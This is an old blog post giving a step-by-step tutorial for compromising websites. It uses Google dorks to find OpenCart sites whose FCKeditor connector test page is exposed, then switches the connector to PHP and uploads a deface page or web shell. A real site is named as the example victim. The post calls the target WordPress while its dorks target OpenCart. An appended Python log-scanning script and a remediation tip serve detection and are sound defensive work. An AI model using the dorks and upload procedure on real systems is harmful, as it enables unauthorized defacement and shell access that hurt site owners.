Saturday, October 8, 2011

This is a very easy technique for exploiting a WordPress website by uploading a deface page or shell.

Here is the procedure:


1- Open Google.com and enter one of these dorks:

    inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    or
    inurl:Powered By OpenCart

    Google will return a lot of websites; select any one.
    You will have to search a lot to find good, fresh vulnerable websites. :P
    For example, I got this one:

    http://www.schoolshopper.com.au/

    Then I simply add the vulnerable URL after the website:

    http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

    (The path may be different on other websites, for example Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

    Now a page will open like this.

    Now look at the connector option at the top left of the page and change the connector to PHP (see the image below).

    Now find the file upload option and upload your deface or shell.
    http://www.schoolshopper.com.au/Cyb3r_dev(1).htm

    To check the shell or deface, open one of these URLs:
      www.site.com/deface.html
      or
      www.site.com/shell.php
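
For site owners, the requests this procedure produces stand out in web server access logs. The following is an added example, not part of the original post: it scans combined-format log lines for requests under the `fckeditor/editor/filemanager/connectors/` path named above and grades each client by whether `test.html` was served and whether a POST under that path got a 2xx answer. The function name, the sample lines, their IPs and the `placeholder-endpoint` path are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Path fragment from the post; compared case-insensitively after URL-decoding.
CONNECTOR_PATH = "fckeditor/editor/filemanager/connectors/"
# Combined log format prefix: client ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def find_connector_activity(lines):
    """Map each client to its connector probes/POSTs and a severity label."""
    hits = defaultdict(lambda: {"probes": 0, "posts": 0, "severity": "low"})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line
        # Decode percent-encoding so an encoded slash still matches the path.
        path = unquote(urlsplit(m["target"]).path).lower()
        if CONNECTOR_PATH not in path:
            continue
        info, served = hits[m["client"]], m["status"].startswith("2")
        if m["method"] == "POST":
            info["posts"] += 1
            if served:
                info["severity"] = "high"    # server answered the POST with 2xx
        elif path.endswith("/test.html"):
            info["probes"] += 1
            if served and info["severity"] == "low":
                info["severity"] = "medium"  # test page is reachable
    return dict(hits)

# Constructed sample lines (documentation IP ranges, placeholder upload endpoint).
P = "/admin/view/javascript/fckeditor/editor/filemanager/connectors"
P_ENCODED = P.replace("/connectors", "%2Fconnectors")
SAMPLE_LOG = [
    f'203.0.113.7 - - [08/Oct/2011:10:00:01 +0000] "GET {P}/test.html HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [08/Oct/2011:10:00:09 +0000] "POST {P}/placeholder-endpoint HTTP/1.1" 200 312',
    f'198.51.100.23 - - [08/Oct/2011:10:02:00 +0000] "GET {P.upper()}/test.html HTTP/1.1" 404 209',
    f'198.51.100.99 - - [08/Oct/2011:10:03:00 +0000] "GET {P_ENCODED}/test.html HTTP/1.1" 200 5120',
    '192.0.2.10 - - [08/Oct/2011:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, info in find_connector_activity(SAMPLE_LOG).items():
        print(client, info)
```

A "medium" or "high" result means the connector test page is being served publicly; removing the editor's `filemanager/connectors` directory from production or denying access to it at the web server closes that path.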

